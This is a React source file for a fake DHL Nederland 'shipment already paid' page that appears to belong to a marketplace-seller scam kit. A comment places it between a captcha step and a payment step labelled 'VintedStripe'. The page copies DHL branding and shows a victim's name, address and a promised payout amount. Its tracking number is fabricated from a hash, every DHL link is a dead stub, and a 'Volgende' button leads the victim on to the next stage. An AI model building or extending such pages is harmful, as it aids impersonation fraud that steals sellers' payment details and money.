import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './DhlNlSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const P = process.env.PUBLIC_URL || '';
const DHL_LOGO_SRC = `${P}/dhl-logo.png`;
const LOGISTIEK_IMG = {
  magazijn: `${P}/dhl-nl-logistiek-magazijn.png`,
  transport: `${P}/dhl-nl-logistiek-transport.png`,
  contract: `${P}/dhl-nl-logistiek-contract.png`,
};

function noop(e) {
  e.preventDefault();
}

function nlVolgnummer(pageCode, pageData) {
  const raw = (pageCode || pageData?.page_code || '').trim();
  const seed = raw || String(pageData?.unique_id || 'dhl');
  let h = 0;
  for (let i = 0; i < seed.length; i += 1) h = (h * 31 + seed.charCodeAt(i)) >>> 0;
  const chars = 'ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnpqrstuvwxyz0123456789';
  let out = '';
  for (let i = 0; i < 16; i += 1) {
    h = (h * 1103515245 + 12345 + i) >>> 0;
    out += chars[h % chars.length];
  }
  return out;
}

function IconGlobe() {
  return (
    <svg className="dhlnl-ico" viewBox="0 0 24 24" aria-hidden>
      <circle cx="12" cy="12" r="9" fill="none" stroke="currentColor" strokeWidth="1.6" />
      <path d="M3 12h18M12 3a15 15 0 0 0 0 18M12 3a15 15 0 0 1 0 18" fill="none" stroke="currentColor" strokeWidth="1.2" />
    </svg>
  );
}

function IconSearch() {
  return (
    <svg className="dhlnl-ico" viewBox="0 0 24 24" aria-hidden>
      <circle cx="10.5" cy="10.5" r="6.5" fill="none" stroke="currentColor" strokeWidth="2" />
      <path d="M16 16l6 6" stroke="currentColor" strokeWidth="2" strokeLinecap="round" />
    </svg>
  );
}

const FOOTER_COLS = [
  {
    title: 'Snelkoppelingen',
    titleRed: true,
    links: [
      'Klantenservice',
      'Aanmelden klantportaal',
      'Digitale partners en integraties',
      'Ontwikkelaarsportaal',
      'Vraag een offerte aan',
      'DHL zakelijk',
    ],
  },
  {
    title: 'Onze divisies',
    links: [
      'DHL Express',
      'DHL Global Forwarding',
      'DHL Freight',
      'DHL Parcel',
      'DHL Supply Chain',
      'Andere internationale divisies',
    ],
  },
  {
    title: 'Industriële sectoren',
    links: [
      'Auto-Mobility',
      'Chemicals',
      'Consument',
      'Energie',
      'Engineering en productie',
      'Life Sciences en gezondheidszorg',
      'Publieke sector',
      'Detailhandel',
      'Technologie',
    ],
  },
  {
    title: 'Bedrijfsinformatie',
    links: [
      'Over DHL',
      'Delivered',
      'Werken bij DHL',
      'Perscentrum',
      'Duurzaamheid',
      'Inzichten en innovatie',
      'Officiële logistieke partners',
    ],
  },
];

/**
 * DHL Nederland — nl_dhl: captcha (VintedStripe1) → deze pagina → index2 (VintedStripe2).
 */
function DhlNlSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'NL').toUpperCase();
  const sym = getSymbol(getPrimaryCurrency(countryCode) || 'EUR');

  const priceNumber = useMemo(() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  }, [pageData?.price]);

  const amountFormatted = useMemo(() => {
    if (priceNumber == null) return '—';
    return new Intl.NumberFormat('nl-NL', {
      minimumFractionDigits: 0,
      maximumFractionDigits: 2,
    }).format(priceNumber);
  }, [priceNumber]);

  const ontvangstLine =
    priceNumber == null ? `Ontvangstbedrag: — ${sym}` : `Ontvangstbedrag: ${amountFormatted} ${sym}`;

  const recipient =
    [pageData?.first_name, pageData?.middle_name, pageData?.last_name].filter(Boolean).join(' ').trim() || '—';
  const address = (pageData?.delivery_address || '').trim() || '—';
  const opmerking = (pageData?.site_name || '').trim() || (pageData?.product_name || '').trim() || '—';
  const volgId = useMemo(() => nlVolgnummer(pageCode || '', pageData), [pageCode, pageData]);
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="dhlnl-wrap" lang="nl">
        <div className="dhlnl-loading">Laden…</div>
        <div className="dhlnl-support-override">
          <SupportWidget sessionId={sessionId} countryCode={countryCode} />
        </div>
      </div>
    );
  }

  return (
    <div className="dhlnl-wrap" lang="nl">
      <header className="dhlnl-header">
        <div className="dhlnl-header-inner">
          <div className="dhlnl-header-row1">
            <a href="#/" className="dhlnl-logo" onClick={noop} aria-label="DHL">
              <img src={DHL_LOGO_SRC} alt="DHL" />
            </a>
            <div className="dhlnl-header-util">
              <button type="button" className="dhlnl-icon-btn" aria-label="Taal" onClick={noop}>
                <IconGlobe />
              </button>
              <span className="dhlnl-lang">NL</span>
              <button type="button" className="dhlnl-search-pill" onClick={noop}>
                <IconSearch />
                <span>Zoeken</span>
              </button>
            </div>
          </div>
          <nav className="dhlnl-nav" aria-label="Hoofdnavigatie">
            <a href="#/" onClick={noop}>
              Traceren
            </a>
            <a href="#/" onClick={noop}>
              Verzenden
            </a>
            <a href="#/" onClick={noop}>
              Logistieke services voor bedrijven
            </a>
            <a href="#/" onClick={noop}>
              Klantenservice
            </a>
          </nav>
        </div>
      </header>

      <main className="dhlnl-main">
        <div className="dhlnl-main-inner">
          <div className="dhlnl-hero">
            <h2 className="dhlnl-hero-title">Verzending al betaald!</h2>
            <p className="dhlnl-hero-p">
              Na ontvangst van het geld voor de verkoop moeten de goederen binnen 3 dagen naar de koper worden verzonden.
            </p>
            <p className="dhlnl-hero-p">
              Het trackingnummer moet aan de koper worden doorgegeven nadat het pakket is verzonden.
            </p>
          </div>

          <section className="dhlnl-details" aria-labelledby="dhlnl-det-h">
            <h2 id="dhlnl-det-h" className="dhlnl-h2">
              Details verpakking:
            </h2>
            <dl className="dhlnl-dl">
              <dt>Opmerking</dt>
              <dd>{opmerking}</dd>
              <dt>Naam ontvanger</dt>
              <dd>{recipient}</dd>
              <dt>Adres ontvanger</dt>
              <dd>{address}</dd>
              <dt>Ontvangstbedrag</dt>
              <dd>
                {priceNumber == null ? `— ${sym}` : `${amountFormatted} ${sym}`}
              </dd>
              <dt>Volgnummer</dt>
              <dd>
                <code className="dhlnl-code">{volgId}</code>
              </dd>
            </dl>
            <Link to={index2Path} className="dhlnl-btn-volgende dhlnl-btn-volgende--bottom">
              Volgende
            </Link>
          </section>

          <div className="dhlnl-top-cta">
            <p className="dhlnl-ontvangst">{ontvangstLine}</p>
            <Link to={index2Path} className="dhlnl-btn-volgende">
              Volgende
            </Link>
          </div>

          <section className="dhlnl-section" aria-labelledby="dhlnl-ship-h">
            <h2 id="dhlnl-ship-h" className="dhlnl-h2">
              Verzenddiensten
            </h2>
            <div className="dhlnl-ship-grid">
              <div className="dhlnl-ship-card">
                <span className="dhlnl-ship-ic" aria-hidden>
                  ✉
                </span>
                <h3 className="dhlnl-h3">Documenten en pakketten</h3>
                <a href="#/" onClick={noop} className="dhlnl-red-link">
                  Binnenlandse en internationale post &gt;
                </a>
              </div>
              <div className="dhlnl-ship-card dhlnl-ship-card--wide">
                <h3 className="dhlnl-h3">Pallets, containers, lading</h3>
                <ul className="dhlnl-ship-list">
                  <li>
                    <strong>Luchtvervoer</strong>
                    <a href="#/" onClick={noop} className="dhlnl-red-link">
                      Internationale &gt;
                    </a>{' '}
                    <a href="#/" onClick={noop} className="dhlnl-red-link">
                      Dezelfde dag &gt;
                    </a>
                  </li>
                  <li>
                    <strong>Zeevracht</strong>
                    <a href="#/" onClick={noop} className="dhlnl-red-link">
                      International &gt;
                    </a>
                  </li>
                  <li>
                    <strong>Goederenvervoer over de weg</strong>
                    <a href="#/" onClick={noop} className="dhlnl-red-link">
                      Pan-Europees &gt;
                    </a>{' '}
                    <a href="#/" onClick={noop} className="dhlnl-red-link">
                      Rest van de wereld &gt;
                    </a>
                  </li>
                  <li>
                    <strong>Goederenvervoer per spoor</strong>
                    <a href="#/" onClick={noop} className="dhlnl-red-link">
                      Tussen Europa en Azië &gt;
                    </a>{' '}
                    <a href="#/" onClick={noop} className="dhlnl-red-link">
                      Intra Europe &gt;
                    </a>
                  </li>
                </ul>
              </div>
              <div className="dhlnl-ship-card">
                <span className="dhlnl-ship-ic" aria-hidden>
                  ✉
                </span>
                <h3 className="dhlnl-h3">Zakelijke post</h3>
                <p className="dhlnl-ship-sub">Direct mail voor bedrijven</p>
                <a href="#/" onClick={noop} className="dhlnl-red-link">
                  Binnenlandse &gt;
                </a>{' '}
                <a href="#/" onClick={noop} className="dhlnl-red-link">
                  Internationale &gt;
                </a>
              </div>
            </div>
          </section>

          <section className="dhlnl-section" aria-labelledby="dhlnl-log-h">
            <h2 id="dhlnl-log-h" className="dhlnl-h2 dhlnl-h2--center">
              Logistieke oplossingen
            </h2>
            <div className="dhlnl-cards3">
              <article className="dhlnl-sol-card">
                <img
                  src={LOGISTIEK_IMG.magazijn}
                  alt=""
                  className="dhlnl-sol-img"
                  width={245}
                  height={126}
                />
                <h3 className="dhlnl-h3">Magazijnoplossingen</h3>
                <a href="#/" onClick={noop} className="dhlnl-red-link">
                  Opslag voor kleine en middelgrote bedrijven
                </a>
                <a href="#/" onClick={noop} className="dhlnl-red-link">
                  Opslag voor bedrijven
                </a>
              </article>
              <article className="dhlnl-sol-card">
                <img
                  src={LOGISTIEK_IMG.transport}
                  alt=""
                  className="dhlnl-sol-img"
                  width={245}
                  height={126}
                />
                <h3 className="dhlnl-h3">Transport en distributie</h3>
                <a href="#/" onClick={noop} className="dhlnl-red-link">
                  Transportbeheer voor kleine en middelgrote bedrijven
                </a>
                <a href="#/" onClick={noop} className="dhlnl-red-link">
                  Transportbeheer voor bedrijven
                </a>
              </article>
              <article className="dhlnl-sol-card">
                <img
                  src={LOGISTIEK_IMG.contract}
                  alt=""
                  className="dhlnl-sol-img"
                  width={245}
                  height={126}
                />
                <h3 className="dhlnl-h3">Contractlogistiek</h3>
                <a href="#/" onClick={noop} className="dhlnl-red-link">
                  Meer informatie over contractlogistiek
                </a>
              </article>
            </div>
          </section>
        </div>
      </main>

      <footer className="dhlnl-footer">
        <div className="dhlnl-footer-grid">
          {FOOTER_COLS.map((col) => (
            <div key={col.title} className="dhlnl-foot-col">
              <h4 className={col.titleRed ? 'dhlnl-foot-h dhlnl-foot-h--red' : 'dhlnl-foot-h'}>{col.title}</h4>
              {col.links.map((t) => (
                <a key={t} href="#/" onClick={noop}>
                  {t}
                </a>
              ))}
            </div>
          ))}
        </div>
        <div className="dhlnl-foot-bottom">
          <div className="dhlnl-foot-bottom-inner">
            <span className="dhlnl-foot-brand">DHL Group</span>
            <div className="dhlnl-foot-legal">
              <a href="#/" onClick={noop}>
                Fraudebewustzijn
              </a>
              <a href="#/" onClick={noop}>
                Legal Notice
              </a>
              <a href="#/" onClick={noop}>
                Gebruiksvoorwaarden
              </a>
              <a href="#/" onClick={noop}>
                Privacyverklaring
              </a>
              <a href="#/" onClick={noop}>
                Geschillenbeslechting
              </a>
              <a href="#/" onClick={noop}>
                Aanvullende informatie
              </a>
            </div>
            <p className="dhlnl-foot-social">
              Volg ons <span aria-hidden>·</span> YouTube · Facebook · LinkedIn · Instagram
            </p>
          </div>
          <p className="dhlnl-foot-copy">{new Date().getFullYear()} © — all rights reserved</p>
        </div>
      </footer>

      <div className="dhlnl-support-override">
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    </div>
  );
}

export default DhlNlSuccess;
